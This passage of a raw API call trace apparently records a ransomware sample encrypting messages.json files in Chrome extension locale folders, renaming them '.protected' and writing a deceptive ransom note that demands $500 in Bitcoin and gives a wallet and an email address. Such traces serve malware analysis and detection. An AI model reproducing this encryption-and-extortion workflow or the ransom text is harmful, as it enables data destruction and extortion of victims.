(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.823] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.823] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.823] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.823] CloseHandle (hObject=0x164) returned 1 [0078.824] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.824] lstrcmpiW (lpString1="tr", lpString2="Windows") returned -1 [0078.824] lstrcmpiW (lpString1="tr", lpString2="Program Files") returned 1 [0078.824] lstrcmpiW (lpString1="tr", lpString2="Program Files (x86)") returned 1 [0078.824] lstrcmpiW (lpString1="tr", lpString2="$Recycle.bin") returned 1 [0078.824] lstrcmpiW (lpString1="tr", lpString2="System Volume Information") returned 1 [0078.824] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr") returned 141 [0078.824] lstrcmpW (lpString1="tr", lpString2=".") returned 1 [0078.824] lstrcmpW (lpString1="tr", lpString2="..") returned 1 [0078.824] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\*") returned 143 [0078.824] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.825] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.825] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.825] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.825] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.825] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.825] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\.") returned 143 [0078.825] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.825] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.825] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.825] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.825] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.825] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.825] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.825] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\..") returned 144 [0078.825] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.825] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.825] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.825] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.825] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.825] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.825] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.825] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.825] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json") returned 155 [0078.825] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.825] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.825] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.825] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.826] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json") returned 155 [0078.826] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.826] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json") returned 155 [0078.826] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.826] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json") returned 155 [0078.826] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.826] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0078.827] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.827] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0078.827] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.827] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.827] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.827] CloseHandle (hObject=0x168) returned 1 [0078.827] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.protected") returned 165 [0078.827] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.protected")) returned 1 [0078.827] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.827] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.828] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\RESTORE_FILES.txt") returned 159 [0078.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.828] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.828] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.829] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.829] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.829] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.829] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.829] CloseHandle (hObject=0x164) returned 1 [0078.829] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.829] lstrcmpiW (lpString1="uk", lpString2="Windows") returned -1 [0078.829] lstrcmpiW (lpString1="uk", lpString2="Program Files") returned 1 [0078.829] lstrcmpiW (lpString1="uk", lpString2="Program Files (x86)") returned 1 [0078.829] lstrcmpiW (lpString1="uk", lpString2="$Recycle.bin") returned 1 [0078.829] lstrcmpiW (lpString1="uk", lpString2="System Volume Information") returned 1 [0078.829] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk") returned 141 [0078.829] lstrcmpW (lpString1="uk", lpString2=".") returned 1 [0078.829] lstrcmpW (lpString1="uk", lpString2="..") returned 1 [0078.829] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\*") returned 143 [0078.829] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.830] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.830] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.830] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.830] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.830] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.830] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\.") returned 143 [0078.830] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.830] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.830] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.830] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.830] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.830] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.830] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.830] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\..") returned 144 [0078.830] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.830] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.830] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.830] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.830] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.830] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.830] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.830] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.830] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json") returned 155 [0078.830] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.830] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.830] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.830] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.830] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.831] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json") returned 155 [0078.831] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.831] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json") returned 155 [0078.831] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.831] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json") returned 155 [0078.831] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.831] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0x10e, lpOverlapped=0x0) returned 1 [0078.831] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.831] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0x10e, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0x10e, lpOverlapped=0x0) returned 1 [0078.832] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.832] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.832] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.832] CloseHandle (hObject=0x168) returned 1 [0078.832] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.protected") returned 165 [0078.832] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.protected")) returned 1 [0078.832] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.832] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.832] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\RESTORE_FILES.txt") returned 159 [0078.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.833] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.833] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.833] lstrlenA 